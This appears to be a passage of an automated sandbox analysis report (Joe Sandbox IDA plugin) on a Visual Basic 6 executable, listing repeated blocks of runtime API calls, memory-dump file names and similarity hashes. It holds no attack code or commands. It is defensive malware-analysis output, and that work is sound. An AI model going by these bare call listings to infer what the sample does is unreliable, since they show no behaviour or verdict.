                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsBstrGenerateList$#616CopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 1495372892-0
                                                                                    • Opcode ID: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                    • Instruction ID: a67bb8bcd321ef6f9d89d5af411f850dddceec761c9aca37c4a66d17d3038916
                                                                                    • Opcode Fuzzy Hash: 22a3bcf0e505ccb7d1cfaf72ba36ede29405f1e0ff0f99610f098486df82b262
                                                                                    • Instruction Fuzzy Hash: 19C127B0E002199FCB14DFA5DD84AEEBBB9FB48300F50816EE50AA7250DB746985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • #631.MSVBVM60(00000000,-00000001,?), ref: 00417209
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041722A
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00417233
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$System$Unlock$#631BoundsGenerateList$#616BstrCopyLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 591398060-0
                                                                                    • Opcode ID: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                    • Instruction ID: 5850bdb2f8cb840655fe358dbb68f1bf167492e12e76f8ba6df4694bbfc137e4
                                                                                    • Opcode Fuzzy Hash: 961b67fc1f124d54495ebaca63011b730f5cf7ed414c292a9bb7346f90505c59
                                                                                    • Instruction Fuzzy Hash: 88C117B0E002199FDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB746985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaInStr.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 00417157
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 00417180
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$BstrSystemUnlock$#616#631BoundsCopyGenerateListLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 4020600759-0
                                                                                    • Opcode ID: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                    • Instruction ID: 6f59f1f6fd00cf4eb64356afd8b00aa24b7c42f8971466ecdf1fdd0f8cb9e506
                                                                                    • Opcode Fuzzy Hash: 01b4123d1384e175d7db15ed5fda37c47c0d54542c8545c3d7772e666950e406
                                                                                    • Instruction Fuzzy Hash: D8C108B1E00218DFDB14DFA9DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • #709.MSVBVM60(00000000,Function_00009254,00000000,00000000), ref: 004171A4
                                                                                    • #616.MSVBVM60(00000000,00000000), ref: 00417754
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041775F
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00417769
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417770
                                                                                    • #631.MSVBVM60(00000000,-00000001,0000000A,00000000), ref: 0041778E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417799
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0041779C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 004177A5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004177B5
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004177C1
                                                                                    • __vbaLenBstr.MSVBVM60(00000000), ref: 004177CD
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 004177F0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?), ref: 00417814
                                                                                    • __vbaAryUnlock.MSVBVM60(?,004178BC), ref: 004178A0
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 004178A9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B4
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004178B9
                                                                                    • __vbaErrorOverflow.MSVBVM60(0000000A,00000000), ref: 00417A16
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$ErrorFreeMove$SystemUnlock$#616#631#709BoundsBstrCopyGenerateListLockOverflow
                                                                                    • String ID:
                                                                                    • API String ID: 2767930602-0
                                                                                    • Opcode ID: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                    • Instruction ID: fd14dd4b6f58a52c042ba838fbe59068618bb76b1adec8898ddb627e80e0b945
                                                                                    • Opcode Fuzzy Hash: da9e1a5cc3e3cb8c691cd4fe22436f69490de0b4f09a0e23afe83290d4890e94
                                                                                    • Instruction Fuzzy Hash: 6DB118B1E00218DFDB24DFA5DD84AEEBBB9FB48300F50816EE509A7250DB745985CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaAryLock.MSVBVM60(?,00000000,660E6A76,660E6C30,660E9596), ref: 00417B35
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B5A
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00417B6E
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00417B9B
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BB5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00417BC5
                                                                                    • __vbaStrCat.MSVBVM60(?,00406F58,?,00000001), ref: 00417BD5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BDC
                                                                                    • __vbaStrCat.MSVBVM60(00406F58,00000000,?,00000001), ref: 00417BE4
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417BEB
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417BF0
                                                                                    • __vbaStrCat.MSVBVM60(?,00407CCC,00000000,00000001,?,00000001), ref: 00417C13
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C1A
                                                                                    • __vbaStrCat.MSVBVM60(00407CCC,00000000,?,00000001), ref: 00417C22
                                                                                    • __vbaStrMove.MSVBVM60(?,00000001), ref: 00417C29
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000,?,00000001), ref: 00417C2E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?,?,00000001), ref: 00417C59
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00417C6E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?), ref: 00417CA1
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000014), ref: 00417CB2
                                                                                    • __vbaStrCat.MSVBVM60(?,004096D4,00000000,00000001), ref: 00417CE8
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417CEF
                                                                                    • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417CF7
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417CFE
                                                                                    • __vbaStrCat.MSVBVM60(?,00000000), ref: 00417D05
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D0C
                                                                                    • __vbaStrCat.MSVBVM60(004096D4,00000000), ref: 00417D14
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D1B
                                                                                    • __vbaInStr.MSVBVM60(00000001,00000000), ref: 00417D20
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 00417D41
                                                                                    • #618.MSVBVM60(00000000,00000003), ref: 00417D6E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D79
                                                                                    • __vbaStrCat.MSVBVM60(Function_00009254,004096CC,00000000), ref: 00417D86
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00417D8D
                                                                                    • __vbaStrCmp.MSVBVM60(00000000), ref: 00417D90
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000,?,?,?,660E6A76,660E6C30,660E9596), ref: 00418B33
                                                                                    • __vbaAryUnlock.MSVBVM60(?,00418BE2), ref: 00418BB3
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00418BBC
                                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 00418BC5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BD0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BD5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BDA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00418BDF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Move$ErrorFree$SystemUnlock$BoundsGenerateList$#618Lock
                                                                                    • String ID:
                                                                                    • API String ID: 2878159455-0
                                                                                    • Opcode ID: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                    • Instruction ID: 2780b2efc1f4126fd3daf783c884f47e51bc0b84df1625baa5224246725a4293
                                                                                    • Opcode Fuzzy Hash: 5be16d220d7e56eae9262f8b4a6e97e2f65e3b200773761827ff221150c3b68a
                                                                                    • Instruction Fuzzy Hash: 9A7117B0E042189FCB14DFA9DDC4AEEBBB5FB48300F6081AEE509A7250DB745A85CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                    • __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                    • #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                    • #570.MSVBVM60(00000000), ref: 00425A64
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                    • __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                    • #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                    • __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425AF7
                                                                                    • __vbaStrMove.MSVBVM60(00000003), ref: 00425B08
                                                                                    • #616.MSVBVM60(00000000), ref: 00425B0B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B16
                                                                                    • __vbaStrCmp.MSVBVM60(?,00000000), ref: 00425B1D
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00425B3F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425B64
                                                                                    • __vbaStrMove.MSVBVM60(00000004,?), ref: 00425B79
                                                                                    • #618.MSVBVM60(00000000), ref: 00425B7C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B87
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 00425B8A
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 00425BA5
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,00000000,00000000), ref: 00425BB9
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425BCE
                                                                                    • __vbaGet4.MSVBVM60(00000004,?,-00000005,00000000), ref: 00425BD8
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425B95
                                                                                      • Part of subcall function 00411210: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                      • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                      • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                      • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                      • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                      • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C10
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425C1B
                                                                                    • __vbaStrCat.MSVBVM60(0000,?), ref: 00425C2C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425C37
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 00425C47
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00425C4C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425C55
                                                                                    • __vbaFileSeek.MSVBVM60(00000001,00000000), ref: 00425C5A
                                                                                    • #648.MSVBVM60(0000000A), ref: 00425C72
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425C81
                                                                                    • __vbaI2I4.MSVBVM60(?), ref: 00425C8D
                                                                                    • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000), ref: 00425C97
                                                                                    • #525.MSVBVM60(00001000), ref: 00425CA2
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425CAD
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425CE3
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425CEC
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425CF4
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425CFD
                                                                                    • #525.MSVBVM60(?), ref: 00425D29
                                                                                    • __vbaStrMove.MSVBVM60 ref: 00425D34
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425D39
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00425D42
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425D4A
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425D53
                                                                                    • #594.MSVBVM60(0000000A), ref: 00425D77
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425D80
                                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,000000FF,00000000), ref: 00425D9C
                                                                                    • #593.MSVBVM60(0000000A), ref: 00425DC6
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DEF
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 00425DFD
                                                                                    • __vbaFpUI1.MSVBVM60 ref: 00425E1F
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425E37
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00425E5F
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425EAD
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425EB9
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • #593.MSVBVM60(0000000A), ref: 00425EF3
                                                                                    • __vbaFpI4.MSVBVM60 ref: 00425F15
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 00425F20
                                                                                    • __vbaSetSystemError.MSVBVM60 ref: 00425F34
                                                                                    • __vbaRedimPreserve.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00425F4C
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F57
                                                                                    • __vbaPutOwner3.MSVBVM60(0040A08C,?,00000000), ref: 00425F63
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F82
                                                                                    • __vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00425F91
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425F95
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00425F9E
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425FA3
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00425FAC
                                                                                    • __vbaI2I4.MSVBVM60 ref: 00425FB0
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00425FB3
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00425FBC
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0042604C), ref: 00426026
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426035
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042603A
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0042603F
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 00426044
                                                                                    • __vbaErrorOverflow.MSVBVM60 ref: 00426068
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Error$File$#516#631BstrCopyPut3$#525$#593#594#648BoundsCloseGenerateGet3Get4ListOpenOwner3RedimSystem$#537#570#616#618DestructExitOverflowPreserveProcSeek
                                                                                    • String ID: 0000
                                                                                    • API String ID: 292954213-211534962
                                                                                    • Opcode ID: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
